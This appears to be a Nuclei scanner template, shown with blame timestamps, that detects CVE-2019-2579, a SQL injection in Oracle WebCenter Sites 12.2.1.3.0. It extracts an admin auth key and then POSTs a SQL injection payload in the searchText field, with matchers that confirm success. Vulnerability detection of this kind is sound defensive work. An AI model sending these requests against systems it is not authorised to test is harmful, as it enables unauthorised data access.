2021-11-06 10:40:58 +00:00
id : CVE-2019-2579
info :
2022-05-09 16:12:52 +00:00
name : Oracle Fusion Middleware WebCenter Sites 12.2.1.3.0 - SQL Injection
2021-11-06 10:40:58 +00:00
author : leovalcante
severity : medium
2022-05-09 16:12:52 +00:00
description : The Oracle WebCenter Sites component of Oracle Fusion Middleware 12.2.1.3.0 is susceptible to SQL injection via an easily exploitable vulnerability that allows low privileged attackers with network access via HTTP to compromise Oracle WebCenter Sites. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle WebCenter Sites accessible data.
2023-09-27 15:51:13 +00:00
impact : |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL commands, potentially leading to unauthorized access, data manipulation, or denial of service.
2023-09-06 12:53:28 +00:00
remediation : |
Apply the necessary patches or updates provided by Oracle to mitigate the SQL Injection vulnerability.
2021-11-06 10:40:58 +00:00
reference :
- https://outpost24.com/blog/Vulnerabilities-discovered-in-Oracle-WebCenter-Sites
- https://github.com/Leovalcante/wcs_scanner
2022-05-09 16:12:52 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2019-2579
2022-05-17 09:18:12 +00:00
- http://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html
2024-03-23 09:28:19 +00:00
- https://github.com/ARPSyndicate/kenzer-templates
2021-11-06 10:59:41 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 4.3
2021-11-06 10:59:41 +00:00
cve-id : CVE-2019-2579
2023-07-11 19:49:27 +00:00
epss-score : 0.00493
2024-03-23 09:28:19 +00:00
epss-percentile : 0.75701
2023-09-06 12:53:28 +00:00
cpe : cpe:2.3:a:oracle:webcenter_sites:12.2.1.3.0:*:*:*:*:*:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 2
2023-07-11 19:49:27 +00:00
vendor : oracle
product : webcenter_sites
tags : cve,cve2019,oracle,wcs,sqli
2021-11-06 10:40:58 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-11-06 10:40:58 +00:00
- raw :
- |
GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/WebReferences HTTP/1.1
Host : {{Hostname}}
- |
POST /cs/ContentServer HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
_authkey_={{authkey}}&pagename=OpenMarket%2FXcelerate%2FAdmin%2FWebReferences&op=search&urlsToDelete=&resultsPerPage=25&searchChoice=webroot&searchText=%27+and+%271%27%3D%270+--+
matchers-condition : and
matchers :
- type : word
words :
2022-05-09 16:16:12 +00:00
- "value='' and '1'='0 --"
2021-11-06 10:40:58 +00:00
- "Use this utility to view and manage URLs"
condition : and
- type : status
status :
2022-05-09 16:12:52 +00:00
- 200
2023-07-11 19:49:27 +00:00
extractors :
- type : regex
name : authkey
group : 1
regex :
- "NAME='_authkey_' VALUE='([0-9A-Z]+)'>"
internal : true
part : body
2024-03-25 11:57:16 +00:00
# digest: 4b0a00483046022100a67be8c1440b31cb92618dfaee0c1315eb8a3101c9e6a76f69655ddbaf044524022100d8e5319be8a0923c698eb09ce9720219676017828598b80d01133dc3566f8357:922c64590222798bb761d5b6d8e72950